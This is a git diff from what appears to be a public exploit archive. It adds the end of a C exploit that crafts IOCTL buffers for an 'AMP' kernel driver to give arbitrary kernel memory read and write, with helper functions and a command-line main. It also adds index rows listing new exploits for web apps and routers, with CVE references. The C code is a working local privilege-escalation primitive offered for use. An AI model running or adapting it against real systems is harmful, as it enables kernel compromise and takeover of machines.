+    byte* maliciousBuffer = (byte*)malloc(bufferSize);
+    *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5;   //   funciton pointer, this will be 5
+    *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer);   pointer to parameters
+    *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1);  pointer to write return value
+    *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
+    *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16;  // this will be 16
+    *(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2;  // param2
+    *(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)(maliciousBuffer + 0x40); // param3
+    *(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x48);  // param4
+    *(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0;  //unknown
+    *(ULONGLONG*)(maliciousBuffer + 0x48) = 0xffffffff; // param1
+    return (void*)maliciousBuffer;
+}
+
+void* CreateWriteDWORDFromKernelMemoryIOCTLBuffer(void* addressToWriteTo, SIZE_T bufferSize) {
+    byte* maliciousBuffer = (byte*)malloc(bufferSize);
+    *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5;   //   funciton pointer, this will be 5
+    *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer);   pointer to parameters
+    *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1);  pointer to write return value
+    *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
+    *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16;  // this will be 16
+    *(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2;  // param2
+    *(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToWriteTo; // param3
+    *(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x40);  // param4
+    *(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0xffffffff;
+    return (void*)maliciousBuffer;
+}
+
+DWORD leakDWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) {
+    void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(addressToLeak, bufferSize);
+    callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize);
+    free(writeAddresInAMPsKernelMemoryIOCTLBuffer);
+    //address should now be written in kernel memory
+    void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(bufferSize);
+    callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize);
+    DWORD returnVal = *(DWORD*)((byte*)ReadDWORDFromKernelMemoryLeakIOCTLBuffer + 0x40);
+    free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer);
+
+    return returnVal;
+}
+
+void writeDWORD(void* addressToWrite, void* PDWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) {
+    void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(PDWORDToWrite, bufferSize);
+    callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize);
+    free(writeAddresInAMPsKernelMemoryIOCTLBuffer);
+    //address should now be written in kernel memory
+    void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateWriteDWORDFromKernelMemoryIOCTLBuffer(addressToWrite,bufferSize);
+    callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize);
+    free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer);
+
+    return;
+}
+
+void* leakQWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) {
+
+    DWORD firstDWORD = leakDWORD(addressToLeak, deviceHandle, bufferSize);
+    DWORD secondDWORD = leakDWORD((byte*)addressToLeak + 0x4, deviceHandle, bufferSize);
+
+    void** Pqword = (void**)malloc(0x8);
+
+    for (int i = 0; i < 4; i++) {
+        ((byte*)Pqword)[i] = ((byte*)&firstDWORD)[i];
+        ((byte*)Pqword)[i + 4] = ((byte*)&secondDWORD)[i];
+    }
+
+    return (*(void**)Pqword);
+}
+
+void writeQWORD(void* addressToWrite, void* QWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) {
+
+
+    writeDWORD(addressToWrite, QWORDToWrite, deviceHandle, bufferSize);
+    writeDWORD((byte*)addressToWrite + 0x4, ((byte*)QWORDToWrite + 0x4), deviceHandle, bufferSize);
+
+}
+
+int main(int argc, char* argv[])
+{
+
+    ULONGLONG addressToReadorWrite = strtoull(argv[2], NULL, 16);
+
+    HANDLE deviceHandle = getDeviceHandle((char*)"\\\\.\\AMP");
+
+    SIZE_T size = 0x300;
+
+    if (strcmp(argv[1], "read") == 0) {
+
+
+        void* leakedQWORD = leakQWORD((void*)addressToReadorWrite, deviceHandle, size);
+
+
+
+        printf("Value stored at virtual address %0llx is %0llx", addressToReadorWrite, leakedQWORD);
+    }
+    else if (strcmp(argv[1], "write") == 0) {
+
+        ULONGLONG QWORDToWrite = strtoull(argv[3], NULL, 16);
+
+
+        writeQWORD((void*)addressToReadorWrite, (void*)&QWORDToWrite, deviceHandle, size);
+
+
+
+        printf("Wrote  %0llx to virtual address %0llx", QWORDToWrite, addressToReadorWrite);
+    }
+
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a5ef53b93..135c2f4cb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -1395,6 +1395,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 13814,exploits/asp/webapps/13814.txt,"Pars Design CMS - Arbitrary File Upload",2010-06-10,Securitylab.ir,webapps,asp,,2010-06-09,,1,,,,,,
 6610,exploits/asp/webapps/6610.txt,"ParsaWeb CMS - 'Search' SQL Injection",2008-09-28,BugReport.IR,webapps,asp,,2008-09-27,,1,OSVDB-48664;CVE-2008-4364,,,,,http://www.bugreport.ir/index_53.htm
 32604,exploits/asp/webapps/32604.txt,"ParsBlogger - 'blog.asp' Cross-Site Scripting",2008-11-29,Pouya_Server,webapps,asp,,2008-11-29,2014-03-31,1,OSVDB-106992,,,,,https://www.securityfocus.com/bid/32529/info
+51055,exploits/asp/webapps/51055.txt,"Password Manager for IIS v2.0 - XSS",2023-03-25,VP4TR10T,webapps,asp,,2023-03-25,2023-03-25,0,CVE-2022-36664,,,,,
 12833,exploits/asp/webapps/12833.txt,"Patient folder (THEME ASP) - SQL Injection",2010-05-31,"SA H4x0r",webapps,asp,,2010-05-30,,1,,,,,,
 30427,exploits/asp/webapps/30427.txt,"Pay Roll Time Sheet and Punch Card Application With Web UI - 'login.asp' SQL Injection",2007-07-28,"Aria-Security Team",webapps,asp,,2007-07-28,2013-12-23,1,CVE-2007-4106;OSVDB-36289,,,,,https://www.securityfocus.com/bid/25114/info
 32151,exploits/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,webapps,asp,,2008-08-04,2014-03-10,1,CVE-2008-3495;OSVDB-47446,,,,,https://www.securityfocus.com/bid/30534/info
@@ -3014,6 +3015,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43119,exploits/hardware/dos/43119.py,"Debut Embedded HTTPd 1.20 - Denial of Service",2017-11-02,z00n,dos,hardware,,2017-11-06,2017-11-06,0,CVE-2017-16249,,,,,
 44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80,2018-07-02,2018-07-02,0,CVE-2018-10594,"Buffer Overflow",,,,
 44934,exploits/hardware/dos/44934.txt,"DIGISOL DG-BR4000NG - Buffer Overflow (PoC)",2018-06-25,"Adipta Basu",dos,hardware,,2018-06-25,2018-06-25,0,CVE-2018-12706,,,,,
+51053,exploits/hardware/dos/51053.txt,"DLink DIR 819 A1 - Denial of Service",2023-03-25,whokilleddb,dos,hardware,,2023-03-25,2023-03-25,0,CVE-2022-40946,,,,,
 32305,exploits/hardware/dos/32305.txt,"Dreambox - Web Interface URI Remote Denial of Service",2008-08-29,"Marc Ruef",dos,hardware,,2008-08-29,2014-03-17,1,,,,,,https://www.securityfocus.com/bid/30919/info
 19513,exploits/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",dos,hardware,,1999-09-27,2012-07-01,1,CVE-1999-1533;OSVDB-13556,,,,,https://www.securityfocus.com/bid/665/info
 18688,exploits/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",dos,hardware,,2012-03-31,2012-03-31,1,OSVDB-80815;OSVDB-80814;CVE-2012-0407;CVE-2012-0406,,,,,http://www.emc.com/backup-and-recovery/data-protection-advisor/data-protection-advisor.htm
@@ -3484,6 +3486,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38725,exploits/hardware/remote/38725.txt,"D-Link DIR-880L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,OSVDB-130405;OSVDB-130400,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
 38716,exploits/hardware/remote/38716.txt,"D-Link DIR-890L/R - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
 33471,exploits/hardware/remote/33471.txt,"D-Link DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,remote,hardware,,2010-01-06,2014-05-22,1,CVE-2010-0936;OSVDB-61615,,,,,https://www.securityfocus.com/bid/37646/info
+51046,exploits/hardware/remote/51046.txt,"D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution",2023-03-25,luka,remote,hardware,,2023-03-25,2023-03-25,0,,,,,,
 43434,exploits/hardware/remote/43434.txt,"D-Link DNS-320 ShareCenter < 1.06 - Backdoor Access",2018-01-03,"GulfTech Security",remote,hardware,,2018-01-05,2018-01-05,0,GTSA-00126,,,,,http://gulftech.org/advisories/DNS-320L%20ShareCenter%20Backdoor/126
 25684,exploits/hardware/remote/25684.html,"D-Link DSL Router - Remote Authentication Bypass",2005-05-19,"Francesco Orro",remote,hardware,,2005-05-19,2013-05-24,1,CVE-2005-1827;OSVDB-16691,,,,,https://www.securityfocus.com/bid/13679/info
 40735,exploits/hardware/remote/40735.sh,"D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,,2016-11-08,2017-09-15,0,,,,,,
@@ -13083,6 +13086,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 20788,exploits/php/webapps/20788.txt,"AB Banner Exchange - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",webapps,php,,2012-08-24,2012-08-24,1,OSVDB-84931,,,,,
 16044,exploits/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",2011-01-25,"Dr.0rYX & Cr3W-DZ",webapps,php,,2011-01-25,2011-01-25,0,,,,,,
 40877,exploits/php/webapps/40877.md,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",webapps,php,,2016-12-06,2016-12-06,0,,,,,,
+51058,exploits/php/webapps/51058.txt,"Abantecart v1.3.2 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-26521,,,,,
 27934,exploits/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - 'content.php' SQL Injection",2006-06-01,SpC-x,webapps,php,,2006-06-01,2013-08-29,1,CVE-2006-2853;OSVDB-26226,,,,,https://www.securityfocus.com/bid/18218/info
 28944,exploits/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",webapps,php,,2006-11-08,2013-10-14,1,,,,,,https://www.securityfocus.com/bid/20970/info
 8555,exploits/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54287;CVE-2009-1550,,,,,
@@ -14926,6 +14930,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2021-11-23,0,,,,,,
 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,,
 50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
+51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-35155,,,,,
 9633,exploits/php/webapps/9633.txt,"Bus Script - 'sitetext_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php,,2009-09-09,,1,OSVDB-57985;CVE-2009-4618;OSVDB-57984,,,,,
 41561,exploits/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
 41097,exploits/php/webapps/41097.txt,"Business Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,,
@@ -15856,6 +15861,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48496,exploits/php/webapps/48496.txt,"Composr CMS 10.0.30 - Persistent Cross-Site Scripting",2020-05-21,"Manuel García Cárdenas",webapps,php,,2020-05-21,2020-05-21,0,,,,,,
 49190,exploits/php/webapps/49190.txt,"Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting",2020-12-04,"Parshwa Bhavsar",webapps,php,,2020-12-04,2020-12-04,0,,,,,,
 49749,exploits/php/webapps/49749.txt,"Composr CMS 10.0.36 - Cross Site Scripting",2021-04-07,"Orion Hridoy",webapps,php,,2021-04-07,2021-04-07,0,CVE-2021-30150,,,,,
+51060,exploits/php/webapps/51060.txt,"Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2021-46360,,,,,
 2503,exploits/php/webapps/2503.txt,"compteur 2.0 - 'param_editor.php' Remote File Inclusion",2006-10-10,DarkFig,webapps,php,,2006-10-09,,1,OSVDB-29617;CVE-2006-5259,,,,,
 34536,exploits/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php,,2010-08-26,2014-09-05,1,,,,,,https://www.securityfocus.com/bid/42773/info
 33178,exploits/php/webapps/33178.txt,"Computer Associates SiteMinder - '%00' Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",webapps,php,,2009-06-08,2014-05-04,1,CVE-2009-2704;OSVDB-56970,,,,,https://www.securityfocus.com/bid/36086/info
@@ -17543,6 +17549,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48882,exploits/php/webapps/48882.txt,"Employee Management System 1.0 - Authentication Bypass",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,,
 48881,exploits/php/webapps/48881.txt,"Employee Management System 1.0 - Cross Site Scripting (Stored)",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,,
 49215,exploits/php/webapps/49215.txt,"Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting",2020-12-08,"Ritesh Gohil",webapps,php,,2020-12-08,2020-12-08,0,,,,,,
+51049,exploits/php/webapps/51049.txt,"Employee Performance Evaluation System v1.0 - File Inclusion and RCE",2023-03-25,nu11secur1ty,webapps,php,,2023-03-25,2023-03-25,0,,,,,,
 50467,exploits/php/webapps/50467.txt,"Employee Record Management System 1.2 - 'empid' SQL injection (Unauthenticated)",2021-11-02,"Anubhav Singh",webapps,php,,2021-11-02,2021-11-02,0,,,,,,
 50112,exploits/php/webapps/50112.txt,"Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)",2021-07-08,"Subhadip Nag",webapps,php,,2021-07-08,2021-07-08,0,,,,,,
 49280,exploits/php/webapps/49280.txt,"Employee Record System 1.0 - Multiple Stored XSS",2020-12-17,"Saeed Bala Ahmed",webapps,php,,2020-12-17,2020-12-17,0,,,,,,
@@ -19039,6 +19046,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4602,exploits/php/webapps/4602.txt,"GuppY 4.6.3 - 'index.php?selskin' Remote File Inclusion",2007-11-03,irk4z,webapps,php,,2007-11-02,2017-11-03,1,OSVDB-38492;CVE-2007-5845;OSVDB-38491;CVE-2007-5844,,,,,
 36099,exploits/php/webapps/36099.html,"GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-02-17,"Brandon Murphy",webapps,php,80,2015-02-17,2015-02-17,0,OSVDB-118489;OSVDB-118488,,,,,
 36098,exploits/php/webapps/36098.html,"Guppy CMS 5.0.9/5.00.10 - Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",webapps,php,80,2015-02-17,2015-02-17,0,OSVDB-118487,,,,,
+51052,exploits/php/webapps/51052.txt,"GuppY CMS v6.00.10 - Remote Code Execution",2023-03-25,"Chokri Hammedi",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
 23673,exploits/php/webapps/23673.txt,"Guru Auction 2.0 - Multiple SQL Injections",2012-12-26,v3n0m,webapps,php,,2012-12-26,2012-12-26,1,OSVDB-88753;OSVDB-88752,,,,,
 17350,exploits/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injections",2011-05-30,v3n0m,webapps,php,,2011-05-30,2011-05-30,1,OSVDB-72734;OSVDB-72733,,,,,
 17336,exploits/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection",2011-05-28,v3n0m,webapps,php,,2011-05-28,2011-05-28,1,OSVDB-72736,,,,,
@@ -19314,6 +19322,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-4963;OSVDB-67054,,,,,https://www.securityfocus.com/bid/42247/info
 49854,exploits/php/webapps/49854.txt,"Human Resource Information System  0.1  - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,,2021-05-10,2021-05-10,0,,,,,,
 49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,,
+51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
 9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,,
 35511,exploits/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",webapps,php,,2014-12-10,2014-12-10,0,OSVDB-115638;OSVDB-115637;OSVDB-115636,,,,,
 35510,exploits/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels_ Emiel Florijn",webapps,php,,2014-12-10,2014-12-10,0,OSVDB-115635;CVE-2014-9528,,,,,
@@ -19573,6 +19582,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39737,exploits/php/webapps/39737.txt,"ImpressCMS 1.3.9 - SQL Injection",2016-04-26,"Manuel García Cárdenas",webapps,php,80,2016-04-26,2016-04-26,0,,,,,http://www.exploit-db.comimpresscms-1.3.9.tar.gz,
 50839,exploits/php/webapps/50839.php,"ImpressCMS 1.4.2 - Remote Code Execution (RCE)",2022-03-30,"Egidio Romano",webapps,php,,2022-03-30,2022-03-30,0,CVE-2021-26599,,,,,
 50298,exploits/php/webapps/50298.py,"ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)",2021-09-16,"Halit AKAYDIN",webapps,php,,2021-09-16,2021-09-16,0,,,,,,
+51056,exploits/php/webapps/51056.txt,"ImpressCMS v1.4.3 - Authenticated SQL Injection",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-26986,,,,,
 50890,exploits/php/webapps/50890.txt,"ImpressCMS v1.4.4 - Unrestricted File Upload",2022-05-11,"Ünsal Furkan Harani",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
 34053,exploits/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injections",2010-05-28,"High-Tech Bridge SA",webapps,php,,2010-05-28,2014-07-14,1,,,,,,https://www.securityfocus.com/bid/40431/info
 29331,exploits/php/webapps/29331.txt,"ImpressPages CMS 3.6 - 'manage()' Remote Code Execution",2013-11-01,LiquidWorm,webapps,php,,2013-11-02,2013-11-02,0,OSVDB-99274,,,,,http://zeroscience.mk/en/vulnerabilities/ZSL-2013-5159.php
@@ -21988,6 +21998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23620,exploits/php/webapps/23620.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'derniers_commentaires.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",webapps,php,,2004-01-30,2012-12-24,1,CVE-2004-0246;OSVDB-15990,,,,,https://www.securityfocus.com/bid/9536/info
 23619,exploits/php/webapps/23619.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'fonctions.lib.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",webapps,php,,2004-01-30,2012-12-24,1,CVE-2004-0246;OSVDB-3797,,,,,https://www.securityfocus.com/bid/9536/info
 3870,exploits/php/webapps/3870.txt,"LaVague 0.3 - 'printbar.php?views_path' Remote File Inclusion",2007-05-08,kezzap66345,webapps,php,,2007-05-07,,1,OSVDB-37790;CVE-2007-2607,,,,,
+51050,exploits/php/webapps/51050.txt,"Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal",2023-03-25,nu11secur1ty,webapps,php,,2023-03-25,2023-03-25,0,,,,,,
 42643,exploits/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,,2017-09-10,2017-09-10,0,,,,,,
 27202,exploits/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 - Class SQL Injection",2006-02-13,"GulfTech Security",webapps,php,,2006-02-13,2018-01-05,1,"CVE-2006-0774;OSVDB-23104;BID: 16598;GTSA-00091",,,,,http://gulftech.org/advisories/DB_eSession%20SQL%20Injection/91
 43289,exploits/php/webapps/43289.txt,"Lawyer Search Script 1.1 - 'lawyer-list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2017-12-13,1,CVE-2017-17620,"SQL Injection (SQLi)",,,,
@@ -23170,6 +23181,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34788,exploits/php/webapps/34788.txt,"MODx manager - '/controllers/default/resource/tvs.php?class_key' Traversal Local File Inclusion",2010-09-29,"John Leitch",webapps,php,,2010-09-29,2014-09-26,1,CVE-2010-5278;OSVDB-68265,,,,,https://www.securityfocus.com/bid/43577/info
 45055,exploits/php/webapps/45055.py,"Modx Revolution < 2.6.4 - Remote Code Execution",2018-07-18,"Vitalii Rudnykh",webapps,php,,2018-07-18,2018-07-18,0,,,,,,
 15701,exploits/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting",2010-12-06,LiquidWorm,webapps,php,,2010-12-06,2010-12-06,0,OSVDB-69643,,,,,http://bugs.modx.com/issues/2918
+51059,exploits/php/webapps/51059.txt,"MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-26149,,,,,
 4739,exploits/php/webapps/4739.pl,"MOG-WebShop - 'index.php?group' SQL Injection",2007-12-18,k1tk4t,webapps,php,,2007-12-17,,1,OSVDB-40272;CVE-2007-6466,,,,,
 25304,exploits/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,webapps,php,,2013-05-08,2013-06-24,1,OSVDB-93234;CVE-2012-6495;OSVDB-88825;CVE-2012-6081,,,,http://www.exploit-db.commoin-1.9.5.tar.gz,
 29915,exploits/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",webapps,php,,2007-04-26,2013-11-30,1,CVE-2007-2423;OSVDB-36567,,,,,https://www.securityfocus.com/bid/23676/info
@@ -24018,6 +24030,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2439,exploits/php/webapps/2439.txt,"Newswriter SW 1.42 - 'editfunc.inc.php' File Inclusion",2006-09-27,"Silahsiz Kuvvetler",webapps,php,,2006-09-26,,1,OSVDB-37965;CVE-2006-5102,,,,,
 24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php,,2004-09-01,2013-01-27,1,CVE-2004-1657;OSVDB-9453,,,,,https://www.securityfocus.com/bid/11086/info
 2970,exploits/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion",2006-12-21,3l3ctric-Cracker,webapps,php,,2006-12-20,,1,OSVDB-32400;CVE-2006-6711,,,,,
+51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-3142,,,,,
 28580,exploits/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,webapps,php,,2006-09-13,2013-09-28,1,,,,,,https://www.securityfocus.com/bid/20040/info
 27734,exploits/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,webapps,php,,2006-04-25,2013-08-21,1,CVE-2006-2051;OSVDB-25265,,,,,https://www.securityfocus.com/bid/17685/info
 37012,exploits/php/webapps/37012.txt,"NextBBS 0.6 - 'ajaxserver.php' Multiple SQL Injections",2012-03-27,waraxe,webapps,php,,2012-03-27,2015-05-14,1,OSVDB-80637;CVE-2012-1603,,,,,https://www.securityfocus.com/bid/52728/info
@@ -24365,6 +24378,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50660,exploits/php/webapps/50660.txt,"Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated)",2022-01-13,Himash,webapps,php,,2022-01-13,2022-01-13,0,,,,,,
 50662,exploits/php/webapps/50662.txt,"Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)",2022-01-13,Himash,webapps,php,,2022-01-13,2022-01-13,0,,,,,,
 50661,exploits/php/webapps/50661.txt,"Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS)",2022-01-13,Himash,webapps,php,,2022-01-13,2022-01-13,0,,,,,,
+51045,exploits/php/webapps/51045.txt,"Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)",2023-03-25,"yousef alraddadi",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
 48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php,,2020-05-25,2020-05-25,0,,,,,,
 48897,exploits/php/webapps/48897.txt,"Online Discussion Forum Site 1.0 - XSS in Messaging System",2020-10-19,j5oh,webapps,php,,2020-10-19,2020-10-19,0,,,,,,
 50386,exploits/php/webapps/50386.txt,"Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting",2021-10-07,"Yash Mahajan",webapps,php,,2021-10-07,2021-10-07,0,,,,,,
@@ -26586,6 +26600,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24846,exploits/php/webapps/24846.txt,"phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' SQL Injection",2004-12-15,"GulfTech Security",webapps,php,,2004-12-15,2018-01-05,1,"CVE-2004-1383;OSVDB-12395;GTSA-00052;BID: 11952",,,,,http://gulftech.org/advisories/phpGroupWare%20Multiple%20Vulnerabilities/52
